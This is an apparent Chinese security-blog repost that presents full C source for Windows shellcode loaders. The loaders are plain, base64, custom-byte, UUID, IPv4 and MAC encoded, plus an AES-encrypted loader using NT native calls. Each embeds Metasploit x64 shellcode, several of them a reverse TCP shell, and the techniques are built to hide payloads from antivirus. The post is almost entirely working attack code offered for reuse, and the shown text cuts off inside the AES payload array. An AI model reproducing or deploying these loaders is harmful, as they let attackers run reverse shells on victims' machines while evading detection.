一组shellcode加密方式(附源码)
2023-2-28 23:15:51 Author: 渗透Xiao白帽(查看原文) 阅读量:36 收藏

写过不少关于shellcode的文章,可以参看以前的。正好看到一组对shellcode加密手法的源码,难度不大,推荐给大家,开个脑洞。这个包含:简单的 shellcode 加载器,编码器(base64 - 自定义 - UUID - IPv4 - MAC),加密器(AES),无文件加载器(Winhttp,Sockets)。截图如下:

不多说,上代码。

1、简单加载

#include <Windows.h>#include <stdio.h>int main() {// use payload/windows/x64/shell_reverse_tcp// generate -f c unsigned char payload[] ="\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52""\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48""\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9""\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41""\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48""\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01""\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48""\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0""\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c""\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0""\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04""\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59""\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48""\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00""\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f""\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff""\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb""\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c""\x63\x2e\x65\x78\x65\x00";LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!alloc_mem) {printf("Failed to Allocate memory (%u)\n", GetLastError());return -1;}  MoveMemory(alloc_mem, payload, sizeof(payload));//RtlMoveMemory(alloc_mem, payload, sizeof(payload));DWORD oldProtect;if (!VirtualProtect(alloc_mem, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {printf("Failed to change memory protection (%u)\n", GetLastError());return -2;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to Create the thread (%u)\n", GetLastError());return -3;}printf("\n\nalloc_mem : %p\n", alloc_mem);WaitForSingleObject(tHandle, INFINITE);getchar();return 0;}

2、Encoding:

2-1、Base64 Loading

#include <windows.h>#include <stdio.h>#pragma comment (lib, "Crypt32.lib")int main(void) {    // calc    //const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";    // reverse shell    const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAATSZFuwDUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvgHSoKQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==";    DWORD payloadLen = sizeof(payload);    LPVOID alloc_mem = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);    if (!alloc_mem) {        printf("Failed to allocate memory (%u)\n", GetLastError());        return -1;    }     // base64 decoding    if (!CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)alloc_mem, &payloadLen, NULL, NULL)) {        printf("Failed to decode the payload(%u)\n", GetLastError());        return -2;    }    DWORD OldProtect;    if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {        printf("Failed to change memory protection (%u)\n", GetLastError());        return -3;    }    ((void(*)())alloc_mem)();    return 0;}

2-2、Custom Encoding:

#include <Windows.h>#include <stdio.h>// calc//unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4a, 0xbb, 0x3, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x4a, 0x8e, 0x8f, 0x2, 0x3, 0x1, 0x2, 0x42, 0xbc, 0x32, 0x8d, 0x70, 0x89, 0x100, 0xd7, 0xbc, 0xf2, 0xb6, 0xa4, 0x57, 0x43, 0xbb, 0xa8, 0x96, 0xbf, 0x9e, 0x101, 0xd6, 0x4a, 0x84, 0xc6, 0x29, 0x3e, 0x7, 0x7e, 0xb, 0x82, 0xfc, 0xe2, 0x76, 0x7, 0xbc, 0x49, 0x14, 0x74, 0x70, 0x6c, 0x1, 0x5b, 0x42, 0x8b, 0xdb, 0x101, 0xd6, 0x65, 0x62, 0x6e, 0x64, 0x30, 0x66, 0x7a, 0x66, 0x2 };// reverse shellunsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4b, 0xbf, 0x79, 0x74, 0x34, 0x60, 0x35, 0x33, 0x2, 0x1, 0x43, 0x57, 0x4b, 0x8a, 0xe8, 0x49, 0x83, 0xed, 0xa2, 0x2, 0x2, 0x1, 0x4b, 0x8a, 0xe7, 0x4a, 0xbe, 0x3, 0x2, 0x5, 0xd4, 0x65, 0x5d, 0xb1, 0xf, 0x42, 0x56, 0x4a, 0x8b, 0xe5, 0x4e, 0x8a, 0xf3, 0x42, 0xbc, 0x4d, 0x79, 0x27, 0x9, 0x100, 0xd7, 0x4d, 0x8b, 0xeb, 0x6a, 0x2, 0x3, 0x1, 0x2, 0x5a, 0x43, 0xbb, 0x2b, 0x81, 0x6d, 0x1, 0x101, 0xd6, 0x52, 0x51, 0x4f, 0x32, 0xcb, 0x4e, 0x33, 0xc1, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc3, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc2, 0x43, 0xbb, 0xec, 0x10, 0xe1, 0xe1, 0x101, 0xd6, 0x4a, 0x8a, 0xc9, 0x6b, 0x12, 0x42, 0x5a, 0x4d, 0x8b, 0xe3, 0x4a, 0x8a, 0xfb, 0x42, 0xbc, 0x9a, 0xa7, 0x75, 0x63, 0x100, 0xd7, 0x49, 0x83, 0xc5, 0x42, 0x3, 0x2, 0x1, 0x4b, 0xb9, 0x65, 0x6e, 0x66, 0x1, 0x2, 0x1, 0x2, 0x1, 0x43, 0x51, 0x43, 0x51, 0x4a, 0x8a, 0xe4, 0x58, 0x59, 0x58, 0x4f, 0x32, 0xc2, 0x6b, 0xf, 0x5a, 0x43, 0x51, 0xe4, 0xfd, 0x68, 0xc8, 0x46, 0x25, 0x56, 0x2, 0x3, 0x49, 0x8f, 0x45, 0x26, 0x19, 0xc8, 0x1, 0x6a, 0x49, 0x8b, 0xe7, 0x58, 0x51, 0x43, 0x51, 0x43, 0x51, 0x43, 0x51, 0x4b, 0x100, 0xc2, 0x42, 0x52, 0x4a, 0x101, 0xc9, 0x4f, 0x8a, 0xc3, 0x4d, 0x8b, 0xc2, 0x43, 0xbb, 0x7b, 0xcd, 0x41, 0x87, 0x101, 0xd6, 0x4a, 0x32, 0xd4, 0x49, 0x101, 0xcb, 0x8d, 0xf, 0x43, 0xbb, 0xa, 0x88, 0x1f, 0x61, 0x101, 0xd6, 0xbd, 0xe1, 0x1f, 0x2b, 0xc, 0x42, 0xbc, 0xa7, 0x97, 0xbe, 0x9f, 0x100, 0xd7, 0x49, 0x85, 0xc5, 0x2a, 0x3d, 0x8, 0x7d, 0xc, 0x81, 0xfd, 0xe1, 0x77, 0x6, 0xbd, 0x48, 0x15, 0x73, 0x71, 0x6b, 0x2, 0x5a, 0x43, 0x8a, 0xdc, 0x100, 0xd7 };DWORD payloadLen = sizeof(payload);void Decode(unsigned char* payload) {for (int i = 0; i < payloadLen; i++) {if (i % 2 == 0) {payload[i]--;}else {payload[i] -= 2;}}}int main() {LPVOID alloc_mem = VirtualAlloc(NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!alloc_mem) {printf("Failed to Allocate memory (%u)\n", GetLastError());return -1;}Decode(payload);CopyMemory(alloc_mem, payload, payloadLen);DWORD OldProtect;if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {printf("Failed to Change memory protection (%u)\n", GetLastError());return -2;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to create the Thread (%u)\n", GetLastError());return -3;}WaitForSingleObject(tHandle, INFINITE);return 0;}

2-3、UUID shellcode:

// Stephan Borosh (rvrsh3ll|@424f424f) & Matt Kingstone for the technique#include <Windows.h>#include <stdio.h>#include <Rpc.h>#pragma comment(lib, "Rpcrt4.lib")int main() {     const char* uuids[] = {        "e48348fc-e8f0-00c0-0000-415141505251",        "d2314856-4865-528b-6048-8b5218488b52",        "728b4820-4850-b70f-4a4a-4d31c94831c0",        "7c613cac-2c02-4120-c1c9-0d4101c1e2ed",        "48514152-528b-8b20-423c-4801d08b8088",        "48000000-c085-6774-4801-d0508b481844",        "4920408b-d001-56e3-48ff-c9418b348848",        "314dd601-48c9-c031-ac41-c1c90d4101c1",        "f175e038-034c-244c-0845-39d175d85844",        "4924408b-d001-4166-8b0c-48448b401c49",        "8b41d001-8804-0148-d041-5841585e595a",        "59415841-5a41-8348-ec20-4152ffe05841",        "8b485a59-e912-ff57-ffff-5d49be777332",        "0032335f-4100-4956-89e6-4881eca00100",        "e5894900-bc49-0002-04d2-645bb00d4154",        "4ce48949-f189-ba41-4c77-2607ffd54c89",        "010168ea-0000-4159-ba29-806b00ffd550",        "c9314d50-314d-48c0-ffc0-4889c248ffc0",        "41c18948-eaba-df0f-e0ff-d54889c76a10",        "894c5841-48e2-f989-41ba-99a57461ffd5",        "40c48148-0002-4900-b863-6d6400000000",        "41504100-4850-e289-5757-574d31c06a0d",        "e2504159-66fc-44c7-2454-0101488d4424",        "6800c618-8948-56e6-5041-504150415049",        "5041c0ff-ff49-4dc8-89c1-4c89c141ba79",        "ff863fcc-48d5-d231-48ff-ca8b0e41ba08",        "ff601d87-bbd5-1de0-2a0a-41baa695bd9d",        "8348d5ff-28c4-063c-7c0a-80fbe07505bb",        "6f721347-006a-4159-89da-ffd590909090"    };

HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000); DWORD_PTR ptr = (DWORD_PTR)alloc_mem; int init = sizeof(uuids) / sizeof(uuids[0]);

for (int i = 0; i < init; i++) { RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr); if (status != RPC_S_OK) { printf("UuidFromStringA != RPC_S_OK\n"); CloseHandle(alloc_mem); return -1; } ptr += 16; } EnumSystemLocalesA((LOCALE_ENUMPROCA)alloc_mem, 0); return 0; }

2-4、IPv4 shellcode:

#include <Windows.h>#include <stdio.h>#include <Ip2string.h>#pragma comment(lib, "Ntdll.lib")#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif

int main() { const char* IPv4s[] = { "252.72.131.228", "240.232.192.0", "0.0.65.81", "65.80.82.81", "86.72.49.210", "101.72.139.82", "96.72.139.82", "24.72.139.82", "32.72.139.114", "80.72.15.183", "74.74.77.49", "201.72.49.192", "172.60.97.124", "2.44.32.65", "193.201.13.65", "1.193.226.237", "82.65.81.72", "139.82.32.139", "66.60.72.1", "208.139.128.136", "0.0.0.72", "133.192.116.103", "72.1.208.80", "139.72.24.68", "139.64.32.73", "1.208.227.86", "72.255.201.65", "139.52.136.72", "1.214.77.49", "201.72.49.192", "172.65.193.201", "13.65.1.193", "56.224.117.241", "76.3.76.36", "8.69.57.209", "117.216.88.68", "139.64.36.73", "1.208.102.65", "139.12.72.68", "139.64.28.73", "1.208.65.139", "4.136.72.1", "208.65.88.65", "88.94.89.90", "65.88.65.89", "65.90.72.131", "236.32.65.82", "255.224.88.65", "89.90.72.139", "18.233.87.255", "255.255.93.73", "190.119.115.50", "95.51.50.0", "0.65.86.73", "137.230.72.129", "236.160.1.0", "0.73.137.229", "73.188.2.0", "4.210.100.91", "176.26.65.84", "73.137.228.76", "137.241.65.186", "76.119.38.7", "255.213.76.137", "234.104.1.1", "0.0.89.65", "186.41.128.107", "0.255.213.80", "80.77.49.201", "77.49.192.72", "255.192.72.137", "194.72.255.192", "72.137.193.65", "186.234.15.223", "224.255.213.72", "137.199.106.16", "65.88.76.137", "226.72.137.249", "65.186.153.165", "116.97.255.213", "72.129.196.64", "2.0.0.73", "184.99.109.100", "0.0.0.0", "0.65.80.65", "80.72.137.226", "87.87.87.77", "49.192.106.13", "89.65.80.226", "252.102.199.68", "36.84.1.1", "72.141.68.36", "24.198.0.104", "72.137.230.86", "80.65.80.65", "80.65.80.73", "255.192.65.80", "73.255.200.77", "137.193.76.137", "193.65.186.121", "204.63.134.255", "213.72.49.210", "72.255.202.139", "14.65.186.8", "135.29.96.255", "213.187.224.29", "42.10.65.186", "166.149.189.157", "255.213.72.131", "196.40.60.6", "124.10.128.251", "224.117.5.187", "71.19.114.111", "106.0.89.65", "137.218.255.213", }; PCSTR Terminator = NULL;PVOID LpBaseAddress = NULL;PVOID LpBaseAddress2 = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); if (!hHeap) { printf("Failed to create a heap (%u)\n", GetLastError()); return -1; }void* alloc_mem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000); if (!alloc_mem) { printf("Failed to allocate memory on the heap (%u)\n", GetLastError()); return -2; }DWORD_PTR ptr = (DWORD_PTR)alloc_mem;int init = sizeof(IPv4s) / sizeof(IPv4s[0]);for (int i = 0; i < init; i++) {RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)", IPv4s[i], STATUS, GetLastError());return FALSE;}ptr += 4;} HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL); if (!tHandle) { printf("Failed to Create the thread (%u)\n", GetLastError()); return -3; } WaitForSingleObject(tHandle, INFINITE); return 0;}

2-5、MAC shellcode:

#include <Windows.h>#include <stdio.h>#include <Ip2string.h>#pragma comment(lib, "Ntdll.lib")

#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif#define _CRT_SECURE_NO_WARNINGS#pragma warning(disable:4996)#pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")int Error(const char* msg) {printf("%s (%u)", msg, GetLastError());return 1;}int main() { const char* MAC[] = { "90-90-90-90-90-90", "90-90-90-90-90-90", "90-90-90-90-90-90", "90-90-90-90-90-90", "90-90-90-90-90-90", "90-90-90-90-90-90", "90-90-90-90-90-90" }; int rowLen = sizeof(MAC) / sizeof(MAC[0]);PCSTR Terminator = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);DWORD_PTR ptr = (DWORD_PTR)alloc_mem;for (int i = 0; i < rowLen; i++) {STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlEthernetStringToAddressA failed in %s result %x (%u)", MAC[i], STATUS, GetLastError());return FALSE;}ptr += 6;} HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL); if (!tHandle) { printf("Failed to Create the thread (%u)\n", GetLastError()); return -3; } WaitForSingleObject(tHandle, INFINITE); printf("alloc_mem\n", alloc_mem); getchar(); return 0;}

3、Encrypting:

3-1、AES:

#include <Windows.h>#include <stdio.h>#include <wincrypt.h>#pragma comment (lib, "crypt32.lib")#pragma comment(lib, "ntdll")#define NtCurrentProcess()   ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif

EXTERN_C NTSTATUS NtAllocateVirtualMemory( HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

EXTERN_C NTSTATUS NtProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN OUT PSIZE_T RegionSize, IN ULONG NewProtect, OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID lpStartAddress, IN PVOID lpParameter, IN ULONG Flags, IN SIZE_T StackZeroBits, IN SIZE_T SizeOfStackCommit, IN SIZE_T SizeOfStackReserve, OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject( IN HANDLE Handle, IN BOOLEAN Alertable, IN PLARGE_INTEGER Timeout);void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) { HCRYPTPROV hProv; HCRYPTHASH hHash; HCRYPTKEY hKey; if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) { printf("Failed in CryptAcquireContextW (%u)\n", GetLastError()); return; } if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) { printf("Failed in CryptCreateHash (%u)\n", GetLastError()); return; } if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) { printf("Failed in CryptHashData (%u)\n", GetLastError()); return; } if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) { printf("Failed in CryptDeriveKey (%u)\n", GetLastError()); return; } if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen)) { printf("Failed in CryptDecrypt (%u)\n", GetLastError()); return; } CryptReleaseContext(hProv, 0); CryptDestroyHash(hHash); CryptDestroyKey(hKey);}int main(int argc, char** argv) {char AESkey[] = { 0x64, 0xb5, 0x31, 0xfe, 0xb3, 0x6b, 0xb3, 0x8c, 0x88, 0x6a, 0x4c, 0x38, 0xc, 0xcb, 0x19, 0x4a }; unsigned char AESshellcode[] = { 0x8, 0x21, 0x22, 0xeb, 0xfa, 0xdb, 0x42, 0x9, 0x8e, 0x24, 0xb6, 0x10, 0xfb, 0x93, 0x5b, 0xfe, 0xc3, 0x9d, 0x75, 0x68, 0xcc, 0x35, 0xd0, 0xef, 0xfd, 0x23, 0x70, 0xe3, 0x1, 0x3d, 0x8f, 0xd0, 0xe6, 0x5b, 0x97, 0x5e, 0x79, 0x78, 0x55, 0xf9, 0xaf, 0x71, 0x67, 0x78, 0x3c, 0xd9, 0x4a, 0xe7, 0x81, 0xc, 0xe5, 0x50, 0x46, 0x47, 0xa, 0x2e, 0x79, 0x5b, 0x6f, 0x43, 0x4d, 0x10, 0x2d, 0x35, 0x93, 0x94, 0xdd, 0x8f, 0x36, 0x2d, 0x3, 0xed, 0x9, 0x33, 0xed, 0xe3, 0xe1, 0x43, 0x17, 0xb6, 0xff, 0xe9, 0x69, 0x33, 0x1c, 0x81, 0x83, 0xb, 0xbf, 0x13, 0x1c, 0x25, 0xd5, 0x2f, 0xb8, 0x90, 0x6d, 0x1e, 0xd3, 0x11, 0xd, 0x29, 0xf7, 0x13, 0xde, 0x7e, 0x71, 0x53, 0x7, 0x44, 0xf3, 0xf6, 0xf6, 0xc3, 0x54, 0xb3, 0xaa, 0xe1, 0xd6, 0xbf, 0x1e, 0xa, 0x9c, 0x25, 0x72, 0x9e, 0x8b, 0x54, 0x62, 0x1c, 0xd9, 0x72, 0xab, 0xbd, 0x30, 0x47, 0x65, 0xd2, 0x0, 0x45, 0xb, 0xc4, 0x16, 0xbb, 0x80, 0xf, 0xd4, 0x0, 0x22, 0x40, 0xd3, 0x4d, 0xbb, 0x3f, 0x64, 0xe1, 0xa8, 0x2a, 0x60, 0x1e, 0xd1, 0x0, 0xd9, 0xb3, 0x46, 0xb6, 0x1c, 0xd0, 0xe2, 0xe1, 0x7d, 0x99, 0x9f, 0x8a, 0x70, 0xd5, 0x7d, 0x9c, 0x88, 0xd, 0x2d, 0xbb, 0x4c, 0x2a, 0x3f, 0xeb, 0xfd, 0xdd, 0xad, 0x8f, 0xba, 0xcc, 0x87, 0x3, 0xcf, 0x8f, 0x15, 0x54, 0xc5, 0xc1, 0xa2, 0xcb, 0x9b, 0x14, 0xae, 0xcb, 0x8, 0xf, 0x5a, 0xae, 0x6d, 0x63, 0xf3, 0x82, 0xe2, 0xec, 0x79, 0xe0, 0x1c, 0xb1, 0x85, 0xa9, 0x22, 0xb0, 0x66, 0xe9, 0x73, 0xbe, 0xdc, 0xac, 0xdc, 0x7d, 0x2e, 0xac, 0x5d, 0x29, 0x23, 0x44, 0x11, 0xee, 0xbf, 0xc9, 0x60, 0xa2, 0x1e, 0x7, 0x6d, 0x9e, 0x56, 0xf2, 0xb4, 0x2a, 0xb6, 0x83, 0x4, 0xca, 0x7e, 0xcb, 0x7e, 0x63, 0x8a, 0x70, 0xa1, 0xe5, 0x1f, 0x6f, 0xa, 0x21, 0x2e, 0x5b, 0x4c, 0x6a, 0x62, 0x84, 0x70, 0x33, 0x84, 0xca, 0x48, 0x39, 0x6b, 0x64, 0xc6, 0x4, 0xc6, 0x6f, 0xe2, 0x6d, 0x29, 0xda, 0x78, 0x64, 0x59, 0x13, 0xfe, 0x2, 0x3, 0xd9, 0xe, 0x7e, 0x97, 0x10, 0x7c, 0xbd, 0x9a, 0xf1, 0xbf, 0xce, 0x4e, 0x4, 0xf1, 0x93, 0x25, 0x88, 0x52, 0x99, 0x44, 0xbd, 0x52, 0x7c, 0xfe, 0x2c, 0xdb, 0x50, 0x9, 0x3b, 0x2a, 0xd, 0x30, 0x73, 0x3c, 0x8c, 0xee, 0xec, 0xb8, 0xc8, 0xe3, 0x3d, 0x48, 0xed, 0xc0, 0x4b, 0xd1, 0x8d, 0x48, 0x0, 0x3, 0xd8, 0xc, 0xde, 0x69, 0xf9, 0xe, 0xda, 0x31, 0xfe, 0xb6, 0x77, 0xc4, 0x4d, 0x31, 0x25, 0xc5, 0xd1, 0xa1, 0x11, 0x22, 0x15, 0x8, 0xc7, 0xa5, 0x73, 0x19, 0x3a, 0x87, 0x5, 0xcc, 0x37, 0x34, 0xad, 0x8a, 0xfa, 0xae, 0x6b, 0xf8, 0x38, 0x4a, 0x5, 0x2e, 0x74, 0xda, 0x77, 0x2a, 0xa0, 0x4f, 0xab, 0xcd, 0xbb, 0x2e, 0x2f, 0xb8, 0xf7, 0xa1, 0x91, 0x8e, 0x42, 0x43, 0x85, 0xa, 0x6b, 0xfd, 0x6d, 0x37, 0xd8, 0xa, 0x53, 0x9f, 0x54, 0x49, 0x26, 0x2a, 0x6d, 0x9e, 0x85, 0x30, 0xe5, 0xc7, 0x91, 0x80, 0x75, 0x79, 0xc1, 0x2a, 0x87, 0xc9, 0xd0, 0x47, 0xdd, 0xc3, 0x9f, 0x66, 0xf0, 0x23, 0xf1, 0xa2, 0x4, 0x7e, 